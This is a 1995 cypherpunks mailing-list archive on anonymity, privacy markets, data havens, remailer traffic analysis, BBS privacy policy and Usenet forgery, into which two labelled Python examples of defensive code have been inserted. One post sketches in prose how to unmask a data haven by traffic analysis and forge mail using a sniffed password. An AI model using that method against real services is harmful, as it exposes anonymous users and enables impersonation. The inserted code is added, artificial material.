> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly

Some months ago I extended this to the concept of privacy markets - where
individuals will be able to disclose their 'truename value' to providers
of services (such as libraries, publications) whose marketing would benefit,
in lieu of cash. I rather think big business is in a better position than
government to exploit the 'profiling' fallout of universal use of truenames.
In the hope of increasing the declining signal content on the list, I'm 
reposting my article:
======================
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#35, 31/October/1994: Selling privacy as a commodity

It was once said that you should never post publicly to
cyberspace what you don't want to see in tomorrow's
newspapers. While newspapers are rarely interested in your
idle thoughts, others are. Future employers, advertisers
and an army of 'user profilers' have begun to exploit the
availability of huge data banks of Net traffic, just
waiting to be indexed by your names and opinions.

It is already possible to buy CD-ROM or tape archives of
posts to newsgroups on the Internet. Collecting newsgroup
posts as they arrive is trivial. Apart from ordinary
Internet connections, all newsgroups are available on one-
way, open-access satellite data broadcasts. As traffic
flows in, it can be indexed and backed up on extremely
cheap storage media such as Digital Audio Tape, for later
search and retrieval.

While the US National Security Agency is naturally one of
the best at hunting for signs of incorrect thinking in
cyberspace, several techniques to search large volumes of
data by very flexible criteria are publicly available.
Electronic writing is one of the best sources for
employers to learn the views of prospective employees. The
groups people participate in can also form useful inputs
to consumer profiles. Some companies have already started
offering directory services based on posts to USENET, the
semi-official collection of major newsgroups. It is easy
to imagine Profiles-R-Us shops that sell dossiers on any
individual, detailing political, religious and sexual
preferences, and other interesting tidbits - all the nasty
things you ever said about Microsoft, for instance!

Public discussion is of course just that, and it's
ridiculous to attempt to prevent it being put to use for
purposes not originally intended. The remedy to an
invasion is to build walls; when the invasion is one of
privacy, the walls are technological. Some pioneers are
already protecting themselves through the use of
encryption, digital signatures, and multiple pseudonyms -
making it impossible for profilers to associate opinions
with real people.

In a way, the Invasion Of The Profilers is a good thing -
it will make individuals realize what little privacy they
have, and teach them the value of privacy. Not everyone
will want to seal themselves in private cocoons. Most will
not object to some loss of privacy, but in exchange for a
(not necessarily monetary) share of the profilers'
profits. Individuals will control their privacy and
selectively reduce it when it benefits themselves.

A particularly useful application of this is in an
electronic public library. Once access to data is severely
restricted to protect intellectual property rights, the
Internet as a source of knowledge for everyone will die,
unless libraries are opened to provide information free of
cost. Such libraries need not survive on subsidies;
rather, they can ask for a copy of any information base in
cyberspace from all publishers. By limiting access to
individuals who are willing to give up some privacy, the
library and publishers will benefit from the sale of
users' access records to advertisers. Advertisers will be
delighted, as most other inputs for profiling in a privacy-
aware society will be unavailable. Finally, users will get
free access to information if they so choose, at a cost
that they can agree to.

While one can be frightened by the ease with which a
multitude of Big Brothers can monitor the citizens of
cyberspace, technology, as always, has something for
everyone. As it becomes easier to search through
electronic communications, it also becomes easier to
protect privacy to varying degrees. Individuals will be
forced to be aware of risks to their privacy. With the
opening of markets for profiles, privacy may finally find
a concrete value.

Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).
--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 22:55:04 PST
To: cypherpunks@toad.com
Subject: Re: DH Traffic Volume Analysis
Message-ID: <199501100612.BAA22933@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


Paul J. Ste. Marie writes:
> One problem that remains would be a trail left by the increased traffic 
> to/from a DH vs a normal user.  That could only be fixed by a multitude of 
> DH sites.

Ubiquitous remailing -- having a significant portion of the net population
bouncing around randomly fluctuating encrypted traffic as background noise -- 
should help to cover both remailers and data havens. It would be nice to
have more people firing off occasional encrypted stuff to muddy the waters.
(Picture yourself in Bridge over the River Kwai if it helps ;)

 -L. Futplex McCarthy; PGP key by finger or server

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Mon, 9 Jan 95 22:54:53 PST
To: pstemari@erinet.com (Paul J. Ste. Marie)
Subject: Thoughts on Data Havens
In-Reply-To: <9501100322.AB12220@eri.erinet.com>
Message-ID: <199501100630.BAA10057@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text


Re: 
> At 07:25 PM 1/9/95, dfloyd@io.com wrote:
> > ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
> >it is trivial to use traffic analysis to find where the DH lies.  Just
> >monitor traffic from/to the remailer and do a series of store/retrieves.
> >Then for confirmation, forge a mail from the dh site to the remailer with
> >the password (obtained from sniffing) to yourself. ...

This is a known weakness of the wizvax style remailers.  It is a shame that
they are so easy for naive users to use - while I like the idea of an easy
to use remailer, I have to shudder at how many people think that they are
a secure system, especially when the reason they use them is usually because
of a very real fear of the possible consequences if their lifestyle becomes
public.
 
> Hmm, hmm.  Using c'punk remailers with encrypted send blocks fixes one 
> problem, especially if the c'punk mailers do some sort of file splitting and 
> reassembly along the lines of what happens to IP packets that are too large 
> for a given link.  What would also help would be a mechanism for randomly 
> varying the encrypted send-to block.  The password replay attacks can be 
> fixed by encrypting the transmitted password along with a timestamp/sequence 
> number.

Post a new PGP key and encrypted address block weekly to alt.data.havens,
alt.2600, or a stegoed picture to alt.binaries.pictures.whatever.  If you
are limiting usership, perhaps an autoencrypting majordomo list. 

If you do decide to go the steganography route, keep in mind that users
on other platforms will want to use your DH and pick your stego program
accordingly.  As a Mac user, few things irritate me as much as arj and zip
files on ftp sites.  gzip is a pain also, but at least I can un-gzip in
my shell account before downloading.

> One problem that remains would be a trail left by the increased traffic 
> to/from a DH vs a normal user.  That could only be fixed by a multitude of 
> DH sites.

One way of solving the traffic analysis problem is to have the DH account
also act as a remailer.  It would also be a good idea to only allow DH
commands to be executed if the encrypted (mandatory) control message arrived
from another remailer account - people knowledgeable enough to be using a
dh will probably not mind if they are "forced" to route traffic through
the remailer network - anyone paranoid enough to be a client is going to
tack your address block on the end of a long chain they created themselves.
As an added security measure, when a valid control message is received,
an identical length stream of random garbage should then be encrypted and
passed into the remailer pool.  This would be easier if remailers supported
some sort of bit sink command to trash a message rather than pass it along.

Joe Block <jpb@gate.net>
No man's life, liberty or property are safe while the legislature is in session.
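
The replay fix quoted above (bind the credential to a timestamp and sequence number) and the equal-length cover message from the reply, sketched as an added example that is not part of the original posts or of any remailer's code. It swaps the encryption the posters describe for an HMAC tag from the Python standard library, so the password itself is never sent; the names `seal`, `ControlReceiver` and `cover_message`, the wire layout and the 300-second window are assumptions.

```python
import hashlib
import hmac
import secrets
import struct
import time
from typing import Optional

MAX_SKEW = 300                  # assumed: seconds a control message stays valid
HEADER = struct.Struct(">QQ")   # assumed layout: sequence number, Unix timestamp
TAG_LEN = hashlib.sha256().digest_size


def seal(key: bytes, seq: int, command: bytes, now: Optional[int] = None) -> bytes:
    """Client side: bind the command to a sequence number and a timestamp.

    The shared secret only keys the HMAC, so a sniffer never sees it.
    """
    ts = int(time.time()) if now is None else now
    body = HEADER.pack(seq, ts) + command
    return body + hmac.new(key, body, hashlib.sha256).digest()


class ControlReceiver:
    """Data-haven side: accept each authentic control message at most once."""

    def __init__(self, key: bytes, max_skew: int = MAX_SKEW):
        self.key = key
        self.max_skew = max_skew
        self.last_seq = 0       # highest sequence number accepted so far

    def accept(self, message: bytes, now: Optional[int] = None) -> Optional[bytes]:
        """Return the command if the message is authentic and fresh, else None."""
        now = int(time.time()) if now is None else now
        if len(message) < HEADER.size + TAG_LEN:
            return None
        body, tag = message[:-TAG_LEN], message[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        # Constant-time comparison: forged or altered messages stop here.
        if not hmac.compare_digest(tag, expected):
            return None
        seq, ts = HEADER.unpack_from(body)
        # A captured message that is replayed later falls outside the window.
        if abs(now - ts) > self.max_skew:
            return None
        # A captured message replayed inside the window reuses an old number.
        if seq <= self.last_seq:
            return None
        self.last_seq = seq
        return body[HEADER.size:]


def cover_message(real: bytes) -> bytes:
    """Random filler of identical length to a real control message.

    The remailer layer would encrypt this and route it to a bit sink, so an
    observer counting bytes sees the same traffic either way.
    """
    return secrets.token_bytes(len(real))


def demo() -> dict:
    """Run the constructed scenario: one fresh message, then its replay."""
    key = hashlib.sha256(b"constructed shared secret").digest()
    receiver = ControlReceiver(key)
    msg = seal(key, 1, b"STORE report.txt", now=1_000)
    return {
        "first": receiver.accept(msg, now=1_010),
        "replay": receiver.accept(msg, now=1_020),
        "cover_len_matches": len(cover_message(msg)) == len(msg),
    }


if __name__ == "__main__":
    print(demo())
```

The receiver has to keep `last_seq` across restarts, otherwise every message still inside the time window becomes replayable again.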



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 22:54:30 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous videoconferencing applications
Message-ID: <199501100644.BAA23178@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


Alan Bostick writes:
> I thought so too, at first; but then I thought of this obvious application:
[lurid details omitted ;]

"Ever seen your children bound and blindfolded from across the globe ?  
You will...."

> Whether technology is going to be developed for the convenience of 
> kidnappers and terrorists is an open question. 

I'd answer, "Undoubtedly," but I wonder just how readily available such
technology would be to, uh, the rest of us.
 
> But there is clearly 
> at least this one clear use for anonymous video conferencing.

Perhaps headhunters would find it handy for anonymous job interviews with
candidates who prefer to remain nameless, but not jobless....

 -L. Futplex McCarthy

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Mon, 9 Jan 95 23:54:41 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100432.WAA00738@einstein.ssz.com>
Message-ID: <199501100754.BAA23939@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: root <root@einstein.ssz.com>
[...]
> > What you define as pornography doesn't mean shit, it's what the media and 
> > journalists and fundies etc.. decide is pornographic that you gotta watch 
> > out for. [...]
> >
> I am well aware that what I personally consider pornography carries little
> weight.

One minor nit.  Pornography is not illegal, obscenity is what is regulated.
The difference between the two is the fine line upon which we tread.

> As to data havens being dangerous to run...I don't know. At the recent
> HoHoCon there was a long discussion 'bout networks hidden within networks
> that was very intriguing. If Doug Barnes is reading this he may be
> willing to reiterate some of the talk. I do know that at the moment my
> partners and myself are looking at remailer software running under Linux
> and data havens are something that we have discussed.

That was my talk, and if I ever get around to it I will be putting my notes
and design details for underground internetworking up on the web.  These
notes include the slides from the talk and the technical notes relating to
this issue...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 23:31:44 PST
To: cypherpunks@toad.com
Subject: Re: Traffic generation
Message-ID: <199501100736.CAA23603@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


Joe Block writes:
> As an added security measure, when a valid control message is received,
> an identical length stream of random garbage should then be encrypted and
> passed into the remailer pool.  This would be easier if remailers supported
> some sort of bit sink command to trash a message rather than pass it along.

Lance Cottrell's Mixmaster software supports this -- just use Anon-To: null
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolb <carolb@barton.spring.com>
Date: Tue, 10 Jan 95 01:16:36 PST
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: PRESS RELEASE - RSA Licenses Co
In-Reply-To: <v02110103ab37f1277f38@[198.68.251.11]>
Message-ID: <Pine.3.89.9501100315.A24297-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks, that was nice & handy, & scary.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 10 Jan 95 00:49:55 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com>
Message-ID: <m0rRcHN-0002GeC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> "I'm Wozz" <wozzeck@phantom.com> writes:
> 
>  > Any professional knows better than to read private
>  > mail...and if this is so...then they aren't worthy of having
>  > a site to run
> 
> For legal purposes, most BBS systems declare that for the
> purposes of the ECPA, there is no such thing as private mail on
> their system.  The Sysop is then free to read anything he wishes
> to.  This policy is clearly stated in the user agreements of
> almost all BBS systems offering access to the public.

This may be true of public access BBS systems, but on corporate
sites the smart money pulls the other way.  Smart corps avoid
reading email for the same reason they avoid listening in on 
voice conversations (except in telemarketing etc.).  Likelihood
of a corporation being held liable for any abusive use of a system
by an employee is drastically outweighed by the likelihood of
a costly wrongful dismissal suit should any investigation of private
correspondence reveal some private fact (e.g. they are gay,
they are having an affair, etc.) that leads to their dismissal
(and thus loss of access to the system!).  In other words, abuse by
managers of their supervisory privileges is far more likely to come 
back and haunt the organization than abuse by employees, in legal
terms anyway.

At a recent seminar on doing business on the internet I stated
this opinion to an audience that included at least 20 lawyers.
None disagreed, the numbers are clear enough.  One added the
qualification, which I agree with, that pirated software that
the organization directly benefits from is a specific exception
where the organization is guilty until proven innocent.  But
he hastened to add that the rest of the argument stood up.  We
agreed that a 'software audit' program such as the SPA provides
could meet that need without compromising end user privacy.

Slowly I believe that Prodigy, AOL, etc., are getting this message,
that it costs more to censor than not to.  Reading of the week:
"Defending Pornography", by the head of the ACLU (yes a woman) who
argues that the fight against censorship is equivalent to the fight
for women's rights, and historically has always had the same enemies.
Kind words on the jacket from Friedan and other mainstream feminists.
 
>  > as for PGP, this is an individual thing....I'm sure mike
>  > has no such objections...i know here at MindVox we
>  > don't...in fact, we installed it for the users
> 
> Many BBS Sysops forbid PGP and kick users off their systems who

I can't speak to the paranoia of garage system operators but:

> use it.  They cite fears of encrypted illegal porn and credit
> card numbers passing through their systems, and potential legal
> liability.

We work with a lot of large corporate clients using the internet.
We have recommended PGP as a means of securing privacy for all
corporate communications (note I don't use it from this site as
I don't download all mail from here before reading it, a GUI
PGP that was usable would go a long way to overcoming resistance)
and deal only with BBS operators who fully support user privacy.
As I suggest, we have recommended strongly against investigating
the contents of mail etc., and have been backed by the lawyers
of these organizations who see a nightmare of legal liability
even in the *ability* to look. (When does the ability to look
become an obligation to record?  Go ask your service provider!)

It seems to me that, although there have been some misguided
prosecutions with serious impact on the livelihoods of some
small operators, the defense that the operators did not know
what was moving through their site has held up.  Criminal
liability hinges on knowledge of the act - you cannot be held
criminally liable unless you knew what was going on... period.
Exceptions to that ('guilty until proven innocent' doctrine
that blames the publisher and forces them also to be a censor)
are offensive to the principles of both the law and liberalism.
I would cite broadcasting law as an example of such an abusive
body of law, and note that it was written entirely in this century.

The 'common carrier' status is not a silver bullet, it obligates
carriers to co-operate with authorities to maintain that status,
as it is specially granted.  It is actually better to let it evolve
by precedent, a 'de facto' common carrier defense, as that way it
cannot be withdrawn by a government without special legislation that
itself may be overturned by the courts (in constitutional democracies).

In other words, keep on using PGP, ditch providers who forbid it, and
recommend it to every company you can.  Once it becomes clear to Ford
and Kraft and GM that a decision to hold a BBS operator responsible
for traffic that moved through his system without his intervention,
is also likely to deem *them* responsible for employees (and suppliers!)
once they have established internally a comfortable precedent of just
leaving the mail alone... very expensive and disruptive to overturn...
you can be damn sure that some serious campaign contributions will swing
over to the privacy advocates.

I make these assumptions:  that corporate America, as commercial entities,
have no interest in knowing about anything that is not directly related
to the making of money.  It does not want its business complicated by
the necessity to become a censor of employee discussions.  Piss tests
etc. were an example of DoD over-control forcibly imposed on the private
sector... with predictable results like the Intel Pentagronk (who ever heard
of a serious system being built entirely without benefit of psychoactives?)

With DoD spending disappearing, the military-industrial complex shrinking,
this economic influence is reduced and we get more overt legislative attempts
to exert control like the Clipper, motivated by 'civilian' concerns like
'kiddie porn' (gee Japan has no such laws and it hasn't collapsed yet, has
lower incidence of child molestation too...) and 'violent porn' (same story,
you can get it in Denmark and they have less rape than here...) and 'stolen
goods' (which can be moved around easily enough by a hundred other means).

In other words, the same lame excuses that politicians use every time they
want to control people.  But I don't think business is with the program,
I think corporations only react to fear of liability etc. (which is kept
heightened by governments with their own agenda) which can be reduced by
education and measured by intelligent risk analysis.  In my opinion, as 
the architect of several risk management systems, the latter demonstrates
that the danger is less than 'most BBS operators' think, and it arises
from different factors than they think, to wit:

  If a small service provider is prosecuted for moving alt.binaries.snuff
  through his system, it is not because he carries it: so do 500 other
  service providers, and they can't prosecute them all.  It is because
  he was careless enough to indicate in non-PGP-encrypted email that he
  was intending to make a political donation to the prosecutor's opponent.
  Barring a nationwide crackdown, where the initial prosecution is always
  carefully chosen for minimum public sympathy, these random prosecutions
  are going to be motivated by the petty whims of cops and bureaucrats.
  I see no reason why one would leave one's opinions open to them to read.
  All that can do is make you a target, and who needs to be a target?

That said, I can understand their fear.  If I were operating an internet
service today, I doubt I would have posted this to cypherpunks (which I
read primarily to protect my own privacy, that of my clients, and advise
them on effective means of privacy protection).  Now I'm probably on an
NSA list somewhere... good thing I'm up here in Canada...!

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 10 Jan 95 03:24:11 PST
To: cypherpunks@toad.com
Subject: Julf gets some negitive press!!!
Message-ID: <Wmc4lKjqRuy3075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I found this surfing USENET. Very interesting...


From: cmfaltz@panix.com (Titania)
Subject: SIEGAL STRIKES AGAIN -- HEADS UP, FOLKS; CENSORS GETTING READY
Date: 5 Jan 1995 09:28:40 -0500
Organization: The Q Continuum
Lines: 112
Message-ID: <3egvmo$lfg@panix.com>
NNTP-Posting-Host: panix.com


Check the blurb at the end of this reprint from the San Francisco
Chronicle -- bitch Siegel is complaining about net hoods again, while
supplementing her income providing a how-to book for those hoods -- oh,
she would say her book is informative, bringing Net abuses and scams to
the public knowledge, but human nature being what it is, how much do you
wanna bet scum have been buying up her little tome for ideas?  Check 'er
out, everyone -- she's the face of the enemy -- get ready.


Reprinted from Monday's SF Chronicle

*Anarchy, Chaos on the Internet Must End* Martha S. Siegel

   Elections are over, and, for better or worse, recognized
leadership is installed and working in most places.  Yet, in
Cyberspace, the electronic world dominated by the much vaunted
Internet, there is not much order.  This huge international
computer web tying together about 30 million people is governed
by no one.

   What an amazing state of affairs.  The most powerful
communication medium ever invented is being left to the equivalent of
mob rule.  Last year was the year of the Internet in the media.
Clearly it is now in the mainstream.  Nonetheless, judging by
what you read or hear, the key question of who runs it is not
even an issue.  It is more fun, after all, to contemplate
shopping in an electronic mall or how to order a pizza through a
modem.

   No matter, if you scratch the surface of this big, happy
party, the need for firm direction is all too obvious.  Also
reported in the press is an expanding array of Internet
problems.  Unregulated broadcasting of sexually explicit
material that is readily available to children usually heads the
list, but on-line sexual harassment, profanity, defamation,
forgery and fraud run close seconds.

   The secretiveness that computer communications allows is a
special reason why abuse is easy.  National and personal
security are serious considerations when anyone can, with
complete anonymity, send encrypted information worldwide via the
Internet.  Such problems are further exacerbated by a computer
in Finland called the Anonymous Server, which exists for the
sole purpose of laundering computer messages, much like dirty
money is laundered through small island nations.  Consequently,
if you want to, say, threaten someone with death, your risk of
retribution is small, courtesy of the Anonymous Server.

   Nowhere are Cyberspace difficulties more evident than in the
inevitable swing toward Internet commercialization.  The widely
reported turf war rages on between academic factions that
controlled Internet before it went public and business newcomers
who now want to access its huge audience.  Electronic attacks on
business people by means ranging from computer insults, called
flames, to assorted forms of electronic vandalism, persist
uncontrolled.  Worst of all are the "canceller robots," computer
programs meant to erase the communications of anyone the hackers
who usually launch them want to silence.

   These self-styled vigilantes routinely challenge free speech
in Cyberspace unabated.  Internet access providers, companies
that connect people to the Internet for a profit, likewise
assume the role of censors, arbitrarily closing accounts of
those whom they disapprove.

   Given its international nature, one obvious way to bring much
needed order to the Internet is through diplomacy.  The United
States should lead in this.  A good beginning might be to urge
the Finnish government to deactivate the Anonymous Server.
Diplomacy could also help to establish an international standard
of recognizing laws existing at the point of origin as
controlling the message sender.

   When conflicts arise, governmental diplomacy should again be
the answer, just as it is with other trade and communications
issues.  Next, laws already regulating behavior in the real
world should be applied to Cyberspace.  This is already taking
place on a case-by-case basis, but the process is too slow.  The
Supreme Court should act to create a precedent stating that
crime is crime, even when the criminal instrument is a computer
keyboard.

   In the United States, legislation should be passed making
Internet providers common carriers.  This will get them out of
the business of censorship and under the guiding hand of the
Federal Communications Commission.

   People need safety and order in Cyberspace just as they do in
their homes and on the streets.  The current state of the
Internet makes it clear that anarchy isn't working.  If
recognized governments don't find a way to bring order to the
growing and changing Internet, chaos may soon dictate that the
party is over.

   ** Martha S. Siegel is the author of "How to Make a Fortune
on the Information Superhighway" and CEO of Cybersell in
Scottsdale, Arizona


   In any case, the San Francisco Chronicle may be reached at:

   	Letters to the Editor,
	San Francisco Chronicle
	901 Mission Street
	San Francisco, Ca 94103

   or you can fax a letter at (415) 512-8196







- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
       Anyone who hates Dogs and Kids Can't be All Bad. -- W. C. Fields

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 10 Jan 95 04:07:20 PST
To: mccoy@io.com (Jim McCoy)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100754.BAA23939@pentagon.io.com>
Message-ID: <199501101202.GAA00328@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> [...]
> > > What you define as pornography doesn't mean shit, it's what the media and 
> > > journalists and fundies etc.. decide is pornographic that you gotta watch 
> > > out for. [...]
> > >
> > I am well aware that what I personally consider pornography carries little
> > weight.
> 
> One minor nit.  Pornography is not illegal, obscenity is what is regulated.
> The difference between the two is the fine line upon which we tread.
>
If this is so then everything I have read or seen misses this minor point
completely. Every press release, speech, etc. that I see uses the term
pornography, not obscenity. TV preachers, news anchors, newspapers, DA's,
etc. consistently use the term pornography. The state of Oregon specifically
legalized pornography, not obscenity. 

I think from a legal standpoint there is little difference between the two.
 
> > As to data havens being dangerous to run...I don't know. At the recent
> > HoHoCon there was a long discussion 'bout networks hidden within networks
> > that was very intriguing. If Doug Barnes is reading this he may be
> > willing to reiterate some of the talk. I do know that at the moment my
> 
> That was my talk, and if I ever get around to it I will be putting my notes
> and design details for underground internetworking up on the web.  These
> notes include the slides from the talk and the technical notes relating to
> this issue...
>
Sorry, for the slip.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Tue, 10 Jan 95 06:42:27 PST
To: cypherpunks@toad.com
Subject: Response to CBS News "drive-by" attack on the internet
Message-ID: <199501101442.GAA21852@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


January 10, 1995


Eric Ober
President, CBS News
524 W. 57th Street
New York, NY 10019


Dear Mr. Ober:

In its 1/9/95 evening news broadcast, CBS aired a segment presenting
a number of people who argued that the content of school libraries, 
written communications, and electronic communications should be censored 
for the common good.  Since CBS did not present anyone with an opposing 
point of view, I assume the position presented is believed by CBS to be 
correct and not controversial.

At first I was concerned about your network's apparent lack of support of
first amendment rights to freedom of speech and of the press. Then I 
realized that these freedoms are only to discuss topics which could not 
result in physical or moral harm to anyone.

I have some friends who share your concerns.  They have been trying
for years to reduce availability of morally dangerous materials like 
_The_Catcher_In_The_Rye_ and _Heather_Has_Two_Mommies_.  They will
be so excited to hear that you are now on their side.  

Sincerely,


Brad Dolan
bdolan@well.sf.ca.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Tue, 10 Jan 95 08:27:05 PST
To: cypherpunks@toad.com
Subject: DataHavens
Message-ID: <199501101626.IAA19511@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


If one wonders what sort of physical threat an operator of a datahaven 
could potentially face, then today's (01/10/95) Wall Street Journal 
editorial is must reading.  It's on the Op-Ed page (page A20) and is 
titled: "No Accountability at the FBI".  It discusses the Randy Weaver 
siege in 1992 and the subsequent investigation and whitewash that 
followed.  It's scary stuff!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:44:22 PST
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: netcom discussion in news.admin.misc
In-Reply-To: <199501100351.TAA05721@ix3.ix.netcom.com>
Message-ID: <199501101633.IAA07416@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


johndix@ix.netcom.com (John Dix) writes:

 > I've mentioned to Netnews that a good first step would be to
 > make it harder to forge messages by changing the news
 > software to no longer accept a user-supplied "Sender:" line
 > in the article header, and he has agreed.  However, I fail
 > to understand just *what* is taking so long to make this
 > (much needed) change.

The problem here is that the news transport mechanism is not
particularly resistant to arbitrary text being posted by a user.
Newsreaders can check for forged "From:" or "Sender:" lines, but
newsreaders then call shell scripts like inews and injnews to
process their material.  Users can call these scripts directly
and bypass any checks by the newsreader.  None of this requires
any special privs, and only the lowest level of the news
transport mechanism, relaynews, requires set-user-id netnews to
function.

The latest version of Tin does check for forged "From:" lines,
but the version Netcom runs allows anything to be posted.

Fudging the lower levels of the news transport mechanism to check
"From:" and "Sender:" lines can mess up other things, since
processes may need to inject news into the news stream which they
themselves did not author.

One solution to the problem is to have a secure level of the news
transport mechanism add an "Originator:" line to every message
which it handles. This will identify users attempting forgeries,
and will not require munging of an existing header line.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $
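
The "Originator:" idea from the message above, sketched as an added example (it is not part of the message and not code from any news system). The function names, sample article and host name are constructed, and the authenticated user name is assumed to come from the operating system at the trusted layer, never from the article.

```python
import re
from email.utils import parseaddr


def split_article(raw):
    """Return (fields, body); fields is a list of [name, value] pairs."""
    head, _, body = raw.partition("\n\n")
    fields = []
    for line in head.split("\n"):
        if not line:
            continue
        if line[0] in " \t" and fields:
            # Continuation line: belongs to the previous header field.
            fields[-1][1] += "\n" + line
        elif ":" in line:
            name, value = line.split(":", 1)
            fields.append([name.strip(), value.strip()])
        else:
            raise ValueError("malformed header line: %r" % line)
    return fields, body


def stamp_originator(raw, authenticated_user, host):
    """Trusted-layer step: record who really injected the article.

    From: and Sender: are left alone, because gateways and other processes
    legitimately inject news they did not author. Any Originator: line the
    poster supplied is untrusted and is discarded rather than kept.
    """
    # Assumption: authenticated_user is the login name the trusted layer
    # obtained from the OS. Reject anything that could smuggle in a header.
    if not re.fullmatch(r"[A-Za-z0-9._-]+", authenticated_user):
        raise ValueError("unsafe user name")
    fields, body = split_article(raw)
    kept = [f for f in fields if f[0].lower() != "originator"]
    kept.append(["Originator", "%s@%s" % (authenticated_user, host)])
    head = "\n".join("%s: %s" % (name, value) for name, value in kept)
    return head + "\n\n" + body


def claimed_vs_actual(stamped):
    """List From:/Sender: addresses that differ from the stamped Originator:.

    A mismatch is a lead for the news admin, not proof of forgery.
    """
    fields, _ = split_article(stamped)
    by_name = {}
    for name, value in fields:
        by_name.setdefault(name.lower(), []).append(value)
    originator = by_name["originator"][-1].lower()
    mismatched = []
    for name in ("from", "sender"):
        for value in by_name.get(name, []):
            addr = parseaddr(value)[1].lower()
            if addr != originator:
                mismatched.append((name, addr))
    return {"originator": originator, "mismatched": mismatched}


# Constructed sample: a poster who calls the injection script directly and
# supplies every identifying header, including a fake Originator:.
SAMPLE = (
    "From: postmaster@example.org (Forged Name)\n"
    "Sender: postmaster@example.org\n"
    "Originator: nobody@example.org\n"
    "Newsgroups: misc.test\n"
    "Subject: constructed sample\n"
    "\n"
    "Body text.\n"
)

if __name__ == "__main__":
    stamped = stamp_originator(SAMPLE, "jdoe", "news.example.net")
    print(stamped)
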